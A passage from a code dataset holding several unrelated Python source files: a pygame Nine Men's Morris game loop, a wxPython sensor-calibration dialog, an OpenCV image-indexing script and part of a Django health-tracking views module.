Exception as e:\n print(f\"Error drawing the board: {e}\")\n\ndef draw_game_info(screen, game_functions, gameover):\n # Display the variables from the Board class\n if gameover == True:\n texts = [\n f\"Game Over! Player {2 if game_functions.get_player_turn() == 1 else 1} wins!\"\n ]\n if gameover == False: \n texts = [\n f\"Positions: {game_functions.get_positions()}\",\n f\"Player Turn: {game_functions.get_player_turn()}\",\n f\"Active Mills: {game_functions.get_active_mills()}\",\n f\"Remaining Turns: {game_functions.get_remaining_turns()}\",\n ]\n\n for i, text in enumerate(texts):\n textsurface = myfont.render(text, False, (0, 0, 0))\n screen.blit(textsurface, (10, 600 + i*30))\n\ndef game_loop():\n\n print(\"Initializing game window...\")\n screen.fill(WHITE)\n clock = pygame.time.Clock()\n\n print(\"Entering main game loop...\")\n running = True\n startpos = None\n endpos = None\n removepos = False\n gameover = False\n while running:\n try:\n # Event handling\n \n for event in pygame.event.get():\n print(\" The board positions(A): \", board.get_positions())\n board_positions_now = board.get_positions()\n print(\" The board positions(B): \", board_positions_now)\n\n print(f\"Event: {event}\") # This will print out each event captured\n if event.type == pygame.QUIT:\n print(\"Quit event detected. 
Closing game window...\")\n board.cleanup()\n running = False\n break\n \n print(\"event.type: \", event.type)\n print(\"pygame.MOUSEBUTTONUP: \", pygame.MOUSEBUTTONUP)\n if event.type == pygame.MOUSEBUTTONUP:\n # Check if a clickable area was clicked\n print(\"here\")\n for idx, rect in enumerate(clickables):\n print(\"the clickables are: \", enumerate(clickables))\n print(\"The idx is: \", idx)\n print(\"The rect is: \", rect)\n print(\"here1\")\n print(\"event.pos: \", event.pos)\n if rect.collidepoint(event.pos):\n print(\"here1.5\")\n if removepos == True:\n board_positions_now = board.get_positions()\n if board.form_mill(idx):\n board.check_remove_active_mill()\n removepos = False\n board.save_current_state_to_log()\n break\n break\n if board.get_remaining_turns() != 0:\n print(\"here2\")\n print(f\"Clicked on position: {idx}\")\n if board.place_piece(idx): \n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n break\n board.save_current_state_to_log()\n break\n if board.get_remaining_turns() == 0:\n if board.is_game_over():\n print(\"Game over!\")\n print(f\"Player {2 if board.get_player_turn() == 1 else 1} wins!\") \n gameover = True \n break\n if startpos == None: \n startpos = idx \n print(\"startpos: \", startpos)\n break\n else:\n if startpos == idx:\n break\n endpos = idx\n print(\"endpos: \", endpos)\n if board.player_piece_count() == 3:\n if board.fly_piece(startpos, endpos):\n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n startpos = None\n endpos = None\n break\n board.save_current_state_to_log()\n startpos = None\n endpos = None\n break\n else:\n startpos = None\n endpos = None\n else:\n if board.move_piece(startpos, endpos):\n board.check_remove_active_mill()\n if board.form_mill_GUI():\n removepos = True\n startpos = None\n endpos = None\n break\n board.save_current_state_to_log()\n startpos = None\n endpos = None\n break \n else:\n startpos = None\n endpos = None\n\n #print(\"startpos: \", startpos)\n #print(\"endpos: \", endpos)\n print(\"removepos: \", removepos)\n print(\"board positions: \", board.get_positions())\n print(\"board player turn: \", board.get_player_turn())\n # Add more event handling logic here for other phases\n print(\"remaining turns: \", board.get_remaining_turns())\n # Drawing the game state\n #print(\"Calling draw_board()...\")\n screen.fill(WHITE)\n draw_board(screen, boardImg, board.get_positions(), coords)\n \n #print(\"Calling draw_game_info()...\")\n draw_game_info(screen, board, gameover)\n\n # Updating the display\n #print(\"Updating display...\")\n pygame.display.flip()\n\n # Frame rate\n clock.tick(60)\n except Exception as e:\n print(f\"Error in game loop: {e}\")\n running = False\n\n print(\"Exiting game...\")\n # remove temp file\n board.cleanup()\n\n pygame.quit()\n sys.exit()\n\n# #set positions in board to 1 or 2\n# board.set_positions([1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2,\n# 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0])\n# # Call the main game loop\n#game_functions.new_restart_game()\ngame_loop()","repo_name":"veryberry13/Nine-Men-s-Morris-Group-Project","sub_path":"NineMensMorris_front_end.py","file_name":"NineMensMorris_front_end.py","file_ext":"py","file_size_in_byte":10681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29093946489","text":"import wx\nfrom pubsub import pub\nfrom Enumerations import *\nfrom Dialogs.DialogCalibrate import CalibrateDialog\nfrom Dialogs.DialogProfileManager import 
NamingDialog\nfrom HelperFunctions import infoDialog\nfrom HelperFunctions import changeComboboxBgColour, changeComboboxFgColour\n\n\nclass ViewSensorsDialog(wx.Dialog):\n\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, \"Sensor Settings\")\n \n self.nb = wx.Notebook(self)\n self.parent = parent\n app = wx.GetApp()\n assert app is not None, \"In ViewSensorsDialog.__init__. wx.App not created yet\"\n self.machineSettings = app.machineSettings\n\n self.resultThermocoupleMap = [] # The list to hold the selected results to pass back to the main UI\n self.resultPressureMap = [] # The list to hold the selected results to pass back to the main UI\n\n # Arrays to hold the channel widgets\n self.txtThermocoupleStatuses = []\n self.txtThermocoupleValues = []\n self.btnThermocoupleCalibrate = []\n self.cmbThermocoupleChannels = [] # Dropdown list of placements to choose from\n self.txtThermocoupleLabels = []\n self.txtPressureStatuses = []\n self.txtPressureValues = []\n self.cmbPressureChannels = []\n self.btnPressureCalibrate = []\n self.btnPressureAdd = []\n self.btnPressureRemove = []\n\n\n # Create the tab panels to add to the notebook\n #======================================================================\n self.tabPanels = []\n\n # Make the sizers\n #======================================================================\n thermocoupleGroup = wx.StaticBox(self, wx.ID_ANY, \"Thermocouples (deg. C)\")\n thermocoupleSizer = wx.StaticBoxSizer(thermocoupleGroup, wx.VERTICAL) # wx.HORIZONTAL)\n pressureGroup = wx.StaticBox(self, wx.ID_ANY, \"Pressure Sensors (in H2O)\")\n pressureSizer = wx.StaticBoxSizer(pressureGroup, wx.HORIZONTAL)\n\n instructionsSizer = wx.BoxSizer(wx.HORIZONTAL)\n thermocoupleColumnSizers = []\n pressureGridSizer = wx.FlexGridSizer(3, 6, 5, 5)\n btnSizer = wx.BoxSizer(wx.HORIZONTAL)\n channelsSizer = wx.BoxSizer(wx.VERTICAL)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n instructionsString = \"Check the status of all the sensor channels.\\nCalibrations and TC role set here will be saved in the currently selected profile.\\nYou may also give the channels a unique label by entering it in the box on the right.\\nDisabled thermocouples will not have their data recorded.\"\n self.lblInstructions = wx.StaticText(self, wx.ID_ANY, instructionsString)\n instructionsSizer.Add(self.lblInstructions, 0, wx.ALL, 5)\n\n # Make the thermocouple lists\n #======================================================================\n numTCRows = 10\n #colIdx = -1\n tabIdx = -1\n\n for index in range(self.machineSettings.numTC):\n\n if index % numTCRows == 0:\n tabIdx += 1 # Start adding to the next tab\n self.tabPanels.append(wx.Panel(self.nb)) # Create another tab panel\n thermocoupleColumnSizers.append(wx.FlexGridSizer(numTCRows, 5, 5, 5))\n thermocoupleColumnSizers[tabIdx].AddGrowableCol(4, 1) # Stretch out the last col\n self.tabPanels[tabIdx].SetSizer(thermocoupleColumnSizers[tabIdx])\n\n # Make the controls\n #------------------------------------------------------------------\n # The real time value from the sensor\n self.txtThermocoupleValues.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"------\",\n style=wx.TE_READONLY|wx.TE_CENTER))\n # The channel number and status indicator\n self.txtThermocoupleStatuses.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"CH. 
\" + str(index+1) + \" CLOSED\",\n style=wx.TE_READONLY|wx.TE_CENTER,\n size=(140, -1)))\n self.txtThermocoupleStatuses[index].SetForegroundColour(UIcolours.CTRL_ERROR_FG)\n self.txtThermocoupleStatuses[index].SetBackgroundColour(UIcolours.CTRL_ERROR_BG)\n\n # The calibration button\n self.btnThermocoupleCalibrate.append(wx.Button(self.tabPanels[tabIdx], wx.ID_ANY, \"Calibrate\"))\n self.btnThermocoupleCalibrate[index].Bind(wx.EVT_BUTTON, self.onCalibrate)\n self.btnThermocoupleCalibrate[index].channel = index\n self.btnThermocoupleCalibrate[index].sensorType = \"TC\"\n\n # The channel role mapping combobox\n self.cmbThermocoupleChannels.append(wx.ComboBox(self.tabPanels[tabIdx],\n id=wx.ID_ANY,\n choices=thermocouplePlacementLabels,\n value=thermocouplePlacementLabels[0],\n style=wx.CB_READONLY))\n\n changeComboboxBgColour(self.cmbThermocoupleChannels[index], UIcolours.CTRL_DISABLED_BG)\n changeComboboxFgColour(self.cmbThermocoupleChannels[index], UIcolours.CTRL_DISABLED_FG)\n self.cmbThermocoupleChannels[index].Bind(wx.EVT_COMBOBOX, self.onThermocoupleSelect)\n # Size the combobox to be just right\n height = self.cmbThermocoupleChannels[index].Size[1]\n width, h = self.cmbThermocoupleChannels[index].GetTextExtent(\"AFTERBURNER\")\n self.cmbThermocoupleChannels[index].SetMinSize((width+height+30, height))\n\n self.txtThermocoupleLabels.append(wx.TextCtrl(self.tabPanels[tabIdx],\n wx.ID_ANY,\n \"-------------------------\",\n style=wx.TE_LEFT))\n\n self.txtThermocoupleLabels[index].Bind(wx.EVT_KILL_FOCUS, self.onLabelChange)\n\n # Associate this row with the actual channel for this sensor\n # That way when attached and valuechange events come in\n # we can update the correct row.\n self.txtThermocoupleStatuses[index].channel = index\n self.txtThermocoupleValues[index].channel = index\n self.txtThermocoupleLabels[index].channel = index\n\n # Add them to the sizer.\n #if index % numTCRows == 0:\n # colIdx += 1 # Increment to column index\n # thermocoupleColumnSizers.append(wx.FlexGridSizer(numTCRows, 3, 5, 5))\n\n\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleStatuses[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleValues[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.btnThermocoupleCalibrate[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.cmbThermocoupleChannels[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n thermocoupleColumnSizers[tabIdx].Add(self.txtThermocoupleLabels[index], 1, wx.TOP|wx.LEFT|wx.RIGHT|wx.EXPAND, 2)\n #thermocoupleColumnSizers[tabIdx].Layout()\n\n #for sizer in thermocoupleColumnSizers:\n # thermocoupleSizer.Add(sizer, 1, wx.ALL|wx.EXPAND,15)\n\n # Add all the tab panels to the notebook as tabs\n idx = 1\n for tabPanel in self.tabPanels:\n self.nb.AddPage(tabPanel, \"CH. 
\" + str((numTCRows*(idx-1))+1) + \" - \" + str(numTCRows*idx))\n idx += 1\n\n thermocoupleSizer.Add(self.nb, 1, wx.ALL|wx.EXPAND,15)\n\n\n # Make the pressure sensor lists\n #======================================================================\n for index in range(self.machineSettings.numPres):\n # Make the controls\n\n # Make the dropdown list of serials for this channel\n # Get the list of serial numbers associated with this channel\n self.cmbPressureChannels.append(wx.ComboBox(self,\n id=wx.ID_ANY,\n choices=self.machineSettings.getPressureChannelSerials(index),\n value=self.machineSettings.pressurePlacementLabels[0], # Default to DISABLED\n style=wx.CB_READONLY))\n\n #self.cmbPressureChannels[index].Bind(wx.EVT_COMBOBOX, self.onPressureSelect)\n height = self.cmbPressureChannels[index].Size[1]\n width, h = self.cmbPressureChannels[index].GetTextExtent(\"XXXXXXXX\") # TODO This should be as long as the serial numbers\n self.cmbPressureChannels[index].SetMinSize((width+height+30, height)) # Size the combobox to be just right\n self.cmbPressureChannels[index].SetStringSelection(self.machineSettings.getCurrentPressureChannelSerial(index))\n self.cmbPressureChannels[index].Bind(wx.EVT_COMBOBOX, self.onSerialSelect)\n self.cmbPressureChannels[index].channel = index\n\n self.txtPressureValues.append(wx.TextCtrl(self,\n wx.ID_ANY,\n \"------\",\n style=wx.TE_READONLY|wx.TE_CENTER))\n\n # The label string and connection status\n labelString = \"CH. \" + str(index+1) + \" (\" + self.machineSettings.pressurePlacementLabels[index+1] + \") CLOSED\"\n self.txtPressureStatuses.append(wx.TextCtrl(self,\n wx.ID_ANY,\n labelString,\n style=wx.TE_READONLY|wx.TE_CENTER,\n size=(220, -1)))\n self.txtPressureStatuses[index].SetForegroundColour(UIcolours.CTRL_ERROR_FG)\n self.txtPressureStatuses[index].SetBackgroundColour(UIcolours.CTRL_ERROR_BG)\n\n self.btnPressureCalibrate.append(wx.Button(self, wx.ID_ANY, \"Calibrate\"))\n self.btnPressureCalibrate[index].Bind(wx.EVT_BUTTON, self.onCalibrate)\n self.btnPressureCalibrate[index].channel = index\n self.btnPressureCalibrate[index].sensorType = \"PRESS\"\n\n self.btnPressureAdd.append(wx.Button(self, wx.ID_ANY, \"Add Sensor\"))\n self.btnPressureAdd[index].Bind(wx.EVT_BUTTON, self.onAdd)\n self.btnPressureAdd[index].channel = index\n\n self.btnPressureRemove.append(wx.Button(self, wx.ID_ANY, \"Remove Sensor\"))\n self.btnPressureRemove[index].Bind(wx.EVT_BUTTON, self.onRemove)\n self.btnPressureRemove[index].channel = index\n self.btnPressureRemove[index].Disable()\n\n # Add them to the sizer.\n pressureGridSizer.Add(self.txtPressureStatuses[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.txtPressureValues[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureCalibrate[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.cmbPressureChannels[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureAdd[index], 1, wx.EXPAND, 5)\n pressureGridSizer.Add(self.btnPressureRemove[index], 1, wx.EXPAND, 5)\n\n pressureSizer.Add(pressureGridSizer, 1, wx.ALL|wx.EXPAND,15)\n\n # The buttons\n #======================================================================\n self.btnOK = wx.Button(self, wx.ID_OK, \"OK\")\n self.btnOK.Bind(wx.EVT_BUTTON, self.onOK)\n self.Bind(wx.EVT_CLOSE, self.onQuit)\n btnSizer.Add(self.btnOK, 0, wx.ALL, 5)\n\n # Add all the sizers to the top level\n #======================================================================\n channelsSizer.Add(thermocoupleSizer, 0, wx.ALL|wx.EXPAND, 5)\n channelsSizer.Add(pressureSizer, 
0, wx.ALL|wx.EXPAND, 5)\n topSizer.Add(instructionsSizer, 0, wx.ALL|wx.RIGHT, 5)\n topSizer.Add(channelsSizer, 0, wx.ALL|wx.EXPAND, 5)\n topSizer.Add(btnSizer, 0, wx.ALL|wx.ALIGN_RIGHT, 5)\n \n self.SetSizer(topSizer)\n topSizer.Fit(self)\n topSizer.SetSizeHints(self)\n self.Layout()\n self.Centre()\n \n\n\n # Subscribe to message sent out by the attach handlers\n pub.subscribe(self.onAttach, \"channel.attached\")\n pub.subscribe(self.onValueChange, \"channel.valueChange\")\n # Change the units to C and inH2O because that is what the automatic calibration is based on.\n self.parent.controller.setTemperatureUnits(\"C\")\n self.parent.controller.setPressureUnits(\"inH2O\")\n self.parent.controller.areAllAttached() # Give the user a message you are waiting for the connection\n\n # We then need to process it to make up our list of selected sensors.\n self.loadSavedSelections()\n\n\n def loadSavedSelections(self):\n # Get the saved selection map from the controller and load it here\n # Load the thermocouple channels\n for index, cmb in enumerate(self.cmbThermocoupleChannels):\n placement = int(self.machineSettings.getThermocouplePlacement(index)) # Get the int value of the enum to use as an index\n cmb.SetSelection(placement) #using the enumeration in the map to load the proper selection in the dropbox\n changeComboboxBgColour(cmb, thermocoupleSelectionClrs[placement])\n if placement > 0: # we are not disabled\n changeComboboxFgColour(cmb, UIcolours.CTRL_NORMAL_FG)\n\n # Load up the labels as well.\n for index, txt in enumerate(self.txtThermocoupleLabels):\n label = self.parent.controller.getThermocoupleLabel(index)\n txt.SetValue(label)\n\n # Load the pressure channel serials that were saved for each of the channels\n for index, cmb in enumerate(self.cmbPressureChannels):\n serialNumber = self.machineSettings.getCurrentPressureChannelSerial(index)\n cmb.SetValue(serialNumber)\n cmb.SetSelection(self.machineSettings.getPressureChannelSerials(index).index(serialNumber))\n changeComboboxBgColour(cmb, UIcolours.CTRL_DISABLED_BG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_BG)\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_FG)\n\n if cmb.GetSelection() == 0:\n self.btnPressureRemove[index].Disable()\n else:\n self.btnPressureRemove[index].Enable()\n \n\n def onOK(self, event):\n # Stop listening for these values.\n pub.unsubscribe(self.onValueChange, \"channel.valueChange\")\n\n # Pull all the info for the selection into the map\n # TODO Might want to check if all the roles have been assigned and if not check with the user if they want to continue.\n for cmb in self.cmbThermocoupleChannels:\n self.resultThermocoupleMap.append(thermocouplePlacements(cmb.GetSelection())) # This should match up with the enumeration\n\n for cmb in self.cmbPressureChannels:\n self.resultPressureMap.append(cmb.GetStringSelection())\n\n #self.EndModal(wx.ID_OK)\n self.Destroy()\n\n def onQuit(self, event):\n self.resultThermocoupleMap = None\n self.resultPressureMap = None\n pub.unsubscribe(self.onValueChange, \"channel.valueChange\")\n self.Destroy()\n\n\n # def tryToConnect(self):# Remember the furnace enums start at 2\n # # Try to open the selected channels on the DAQ\n # #pub.sendMessage(\"status.update\", msg=\"Opening sensor channels.\")\n # #self.parent.controller.openAllChannels()\n # # Give the user a message you are waiting for the connection\n # self.parent.controller.areAllAttached()\n\n\n def onValueChange(self, sensorType, channel, 
valueRaw, valueNumeric, valueFormatted):\n #TODO should we flag bad values with a red background?\n if sensorType == \"TC\":\n if channel >= self.machineSettings.numTC:\n return\n wx.CallAfter(self.txtThermocoupleValues[channel].SetValue, valueFormatted)\n elif sensorType == \"PRESS\":\n if channel >= self.machineSettings.numPres:\n return\n wx.CallAfter(self.txtPressureValues[channel].SetValue, valueFormatted)\n else:\n # Do nothin\n return\n\n def onAttach(self, sensorType, channel):\n if sensorType == \"TC\":\n if channel >= self.machineSettings.numTC:\n return\n # Ok change the connection status for this channel\n wx.CallAfter(self.txtThermocoupleStatuses[channel].SetValue, \"CH. \" + str(channel+1) + \" OPENED\")\n self.txtThermocoupleStatuses[channel].SetForegroundColour(UIcolours.CTRL_OK_FG)\n self.txtThermocoupleStatuses[channel].SetBackgroundColour(UIcolours.CTRL_OK_BG)\n elif sensorType == \"PRESS\":\n if channel >= self.machineSettings.numPres:\n return\n labelString = \"CH. \" + str(channel+1) + \" (\" + self.machineSettings.pressurePlacementLabels[channel+1] + \") OPENED\"\n wx.CallAfter(self.txtPressureStatuses[channel].SetValue, labelString)\n self.txtPressureStatuses[channel].SetForegroundColour(UIcolours.CTRL_OK_FG)\n self.txtPressureStatuses[channel].SetBackgroundColour(UIcolours.CTRL_OK_BG)\n else:\n # Do nothing.\n return\n\n\n def onCalibrate(self, event):\n button = event.GetEventObject()\n if button.sensorType == \"PRESS\":\n serialNumber = self.cmbPressureChannels[button.channel].GetStringSelection() # Grab the loaded serialNumber\n if (serialNumber and serialNumber.strip()):\n dlg = CalibrateDialog(self, button.sensorType, button.channel, serialNumber)\n else:\n return # Nope out of here.\n else:\n dlg = CalibrateDialog(self, button.sensorType, button.channel)\n dlg.ShowModal()\n dlg.Destroy()\n\n\n def onSerialSelect(self, event):\n # Adjust the current open channel's calibration for the user to see\n cmb = event.GetEventObject()\n channelIndex = cmb.channel\n serialNumber = cmb.GetStringSelection()\n gain, offset = self.parent.controller.getPressureCalibration(channelIndex, serialNumber)\n self.parent.controller.setPressureCurrentCalibration(gain, offset, channelIndex)\n\n changeComboboxBgColour(cmb, UIcolours.CTRL_DISABLED_BG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_BG)\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if cmb.GetSelection() == 0 else UIcolours.CTRL_NORMAL_FG)\n\n if cmb.GetSelection() == 0:\n self.btnPressureRemove[channelIndex].Disable()\n else:\n self.btnPressureRemove[channelIndex].Enable()\n\n\n def onThermocoupleSelect(self, event):\n cmb = event.GetEventObject()\n index = cmb.GetSelection()\n # Change the colour\n changeComboboxBgColour(cmb, thermocoupleSelectionClrs[index])\n changeComboboxFgColour(cmb, UIcolours.CTRL_DISABLED_FG if index == 0 else UIcolours.CTRL_NORMAL_FG)\n\n # TODO Modify this to check that there are not more than 2 AFTERBURNER roles selected\n # Check that the value doesn't exist in the other boxes.\n # If it does then flip them to disabled.\n\n # We have no number limits on placements that are not afterburner. 
You can leave now.\n if index != int(thermocouplePlacements.AFTERBURNER):\n return\n\n # Otherwise, make sure that the afterburner limit is respected.\n numOfAllowedAfterburners = 2\n numFoundAfterburners = 0\n\n for cmbBox in self.cmbThermocoupleChannels:\n if cmbBox is cmb: # Don't try to change yourself.\n continue\n\n # Count up the number of afterburner channels.\n # if >= 2 then disable the later found ones\n if cmbBox.GetSelection() == int(thermocouplePlacements.AFTERBURNER):\n numFoundAfterburners += 1\n if numFoundAfterburners >= numOfAllowedAfterburners:\n cmbBox.SetSelection(int(thermocouplePlacements.DISABLED)) # Set to DISABLED\n changeComboboxBgColour(cmbBox, thermocoupleSelectionClrs[0])\n changeComboboxFgColour(cmbBox, UIcolours.CTRL_DISABLED_FG)\n\n\n def onAdd(self, event):\n btn = event.GetEventObject()\n channelIndex = btn.channel\n # Get the serial number to add.\n dlg = NamingDialog(parent=self, title=\"Enter serial number of pressure sensor\")\n dlg.ShowModal()\n\n # Check and collect the results\n if dlg.resultName is None:\n dlg.Destroy()\n return\n\n # TODO should check if the serial number already exists in the list.\n if dlg.resultName in self.cmbPressureChannels[channelIndex].GetItems():\n infoDialog(self, \"This serial number already exists in the list.\")\n return\n # Add it to the machine settings\n # Append it to the dropdown list.\n self.parent.controller.addPressureSensorToChannel(channelIndex, dlg.resultName)\n self.cmbPressureChannels[channelIndex].Append(dlg.resultName)\n dlg.Destroy()\n\n\n def onRemove(self, event):\n btn = event.GetEventObject()\n channelIndex = btn.channel\n serialNumber = self.cmbPressureChannels[channelIndex].GetStringSelection()\n selectedIndex = self.cmbPressureChannels[channelIndex].GetSelection()\n\n if not(serialNumber and serialNumber.strip()):\n return\n # Ask if they are sure they want to remove the serial from the channel\n dlg = wx.MessageDialog(self, \"Are you sure you want to remove this serial number?\\nThe calibration data for this channel/sensor combination will be lost.\", \"Confirm Removal\", wx.OK|wx.CANCEL|wx.ICON_QUESTION)\n result = dlg.ShowModal()\n dlg.Destroy()\n if result == wx.ID_CANCEL:\n return\n\n # Nope, they really want to remove it.\n # Remove it from the machine settings\n # if selectedIndex == 0: # Not the DISABLED entry though\n # event.Skip()\n\n self.parent.controller.removePressureSensorFromChannel(channelIndex, serialNumber) # Adding the one because we stripped off the 0th index in the init\n self.cmbPressureChannels[channelIndex].Delete(selectedIndex) # Take it out of the combobox\n # TODO BUG need to set this to nothing when all the sensors are removed.\n self.cmbPressureChannels[channelIndex].SetSelection(0) # Change the selection\n if self.cmbPressureChannels[channelIndex].IsListEmpty():\n self.cmbPressureChannels[channelIndex].Clear() # If list is empty erase the text TODO Check if this works on a windows machine.\n\n\n def onLabelChange(self, event):\n \"\"\"\n Clean the entry and save the new label.\n \"\"\"\n txt = event.GetEventObject()\n channelIndex = txt.channel\n label = txt.GetValue()\n\n self.parent.controller.setThermocoupleLabel(label, channelIndex)\n\n event.Skip()\n","repo_name":"sperraton/firetestprogram","sub_path":"Dialogs/DialogViewSensors.py","file_name":"DialogViewSensors.py","file_ext":"py","file_size_in_byte":23860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"747805248","text":"import 
color_descriptor\nimport structure_descriptor\nimport glob\nimport argparse\nimport cv2\n\nidealBins = (8, 12, 3)\ncolorDesriptor = color_descriptor.ColorDescriptor(idealBins)\n\noutput = open(\"colorindex.csv\",\"w\")#arguments[\"colorindex\"], \"w\")\n\nfor imagePath in glob.glob(\"D:/Photos/airplanes_side\"+ \"/*.jpg\"): #arguments[\"dataset\"] + \"/*.jpg\"):\n imageName = imagePath[imagePath.rfind(\"/\") + 1 : ]\n image = cv2.imread(imagePath)\n features = colorDesriptor.describe(image)\n # write features to file\n features = [str(feature).replace(\"\\n\", \"\") for feature in features]\n output.write(\"%s,%s\\n\" % (imageName, \",\".join(features)))\n# close index file\noutput.close()\n\nkps = 100\nstructureDescriptor = structure_descriptor.StructureDescriptor(kps)\n\noutput = open(\"structureindex.csv\", \"w\")#arguments[\"structureindex\"], \"w\")\n\nfor imagePath in glob.glob(\"D:/Photos/airplanes_side\" + \"/*.jpg\"):\n imageName = imagePath[imagePath.rfind(\"/\") + 1 : ]\n image = cv2.imread(imagePath)\n structures = structureDescriptor.describe(image)\n # write structures to file\n structures = [str(structure).replace(\"\\n\", \"\") for structure in structures]\n output.write(\"%s,%s\\n\" % (imageName, \",\".join(structures)))\n# close index file\noutput.close()\n","repo_name":"currybur/EE208-Search-Engine","sub_path":"image_search_engine/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41889399552","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nfrom data.models import Day, Sleep, HappyLog, UnhappyLog, Exercise, FoodScore, HappyScore, TestModel\nfrom data.forms import DayForm, SleepForm, TestForm, FoodForm, ExerciseForm, HSForm, HappyForm, UnhappyForm\nfrom django.forms.models import modelformset_factory\nimport datetime\nfrom random import randint\nimport calendar\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n#CSS\nGOOD = 'good_text'\nOK = 'ok_text'\nBAD = 'bad_text'\n\ndef get_day_list():\n\tday_list = Day.objects.order_by('-date')\n\thappy_list = HappyLog.objects.all()\n\tsad_list = UnhappyLog.objects.all()\n\tfood_score = FoodScore.objects.all()\n\thappy_score = HappyScore.objects.all()\n\texercise = Exercise.objects.all()\n\tsleep = Sleep.objects.all()\n\t\n\tday_log = []\n\tday_list = day_list[get_index_of_today():]\n\tfor d in day_list:\n\t\tda = d.date\n\t\thappy_items = happy_list.filter(date=da)\n\t\tsad_items = sad_list.filter(date=da)\n\t\ttry:\n\t\t\tp_score = food_score.get(date=da).p_score\n\t\t\tg_score = food_score.get(date=da).g_score\n\t\texcept FoodScore.DoesNotExist:\n\t\t\tp_score = None\n\t\t\tg_score = None\n\t\ttry:\n\t\t\th_score = happy_score.get(date=da)\n\t\texcept HappyScore.DoesNotExist:\n\t\t\th_score = None\n\t\texercise_items = exercise.filter(date=da)\n\t\ttry:\n\t\t\tsleep_str = sleep.get(date=da).sleep_str()\n\t\texcept Sleep.DoesNotExist:\n\t\t\tsleep_str = 'n/a'\n\t\tday_log.append({'day':d.date_str, \n\t\t\t\t\t\t'happy_list':[str(h) for h in happy_items], \n\t\t\t\t\t\t'sad_list':[str(s) for s in sad_items],\n\t\t\t\t\t\t'exercise_list':[str(e) for e in exercise_items] if exercise_items else '-',\n\t\t\t\t\t\t'p_score': p_score if p_score is not None else '-',\n\t\t\t\t\t\t'g_score': g_score if g_score is not None else '-',\n\t\t\t\t\t\t'h_score': 
h_score,\n\t\t\t\t\t\t'sleep': sleep_str\n\t\t\t\t\t\t\t\t\t\t})\n\t\t# day_log.append([str(d),str(happy_items)])\n\t\t\n\treturn day_log\n\n# returns a tuple of (avg hours slept, time in bed)\ndef get_sleep_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\tsleep_objects = Sleep.objects.all().filter(date__in=last_week)\n\thours_slept = avg_hours_slept(sleep_objects)\n\ttime_in_bed = avg_time_in_bed(sleep_objects)\n\tif hours_slept >= 7:\n\t\tcss_hours = GOOD\n\telif hours_slept >= 6:\n\t\tcss_hours = OK\n\telse:\n\t\tcss_hours = BAD\n\t\t\n\tif time_in_bed < datetime.time(1,0):\n\t css_time = GOOD\n\telif time_in_bed < datetime.time(2,0):\n\t css_time = OK\n\telif time_in_bed >= datetime.time(2,0) and time_in_bed < datetime.time(12,0):\n\t css_time = BAD\n\telse:\n\t css_time = GOOD\n\t\n\treturn {'avg_hours_slept': hours_slept,\n\t\t\t'avg_time_in_bed': time_in_bed, \n\t\t\t'css_hours' : css_hours,\n\t\t\t'css_time' : css_time\n\t\t\t}\n\ndef get_food_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\tfood_objects = FoodScore.objects.all().filter(date__in=last_week)\n\tp_sum = sum([f.p_score for f in food_objects])\n\tg_sum = sum([f.g_score for f in food_objects])\n\t# keep the percentages numeric so the grade comparisons below work; format as strings only on return\n\tp_percent = 100-round(float(p_sum) / 21,2)*100\n\tg_percent = 100-round(float(g_sum) / 21,2)*100\n\tif p_percent >= 50:\n\t\tp_grade = GOOD\n\telif p_percent >= 30:\n\t\tp_grade = OK\n\telse:\n\t\tp_grade = BAD\n\t\n\tif g_percent >= 80:\n\t\tg_grade = GOOD\n\telif g_percent >= 50:\n\t\tg_grade = OK\n\telse:\n\t\tg_grade = BAD\n\t\n\treturn {'p_percent': str(p_percent)+\"%\",\n\t\t\t'p_grade': p_grade,\n\t\t\t'g_percent': str(g_percent)+\"%\",\n\t\t\t'g_grade': g_grade}\n\t\t\t\ndef get_exercise_summary():\n\tlast_week = [d.date for d in last_n_days(7)]\n\texercise_objects = Exercise.objects.all().filter(date__in=last_week)\n\tdays = percent_days_exercised(exercise_objects,last_week)\n\ttypes = types_exercised(exercise_objects)\n\tif days >= 6:\n\t\tday_grade = GOOD\n\telif days >= 4:\n\t\tday_grade = OK\n\telse:\n\t\tday_grade = BAD\n\treturn {'days': days,\n\t\t\t'types': types,\n\t\t\t'day_grade': day_grade }\n\t\t\t\ndef get_happiness_summary():\n\tlast_week = [d.date for d in 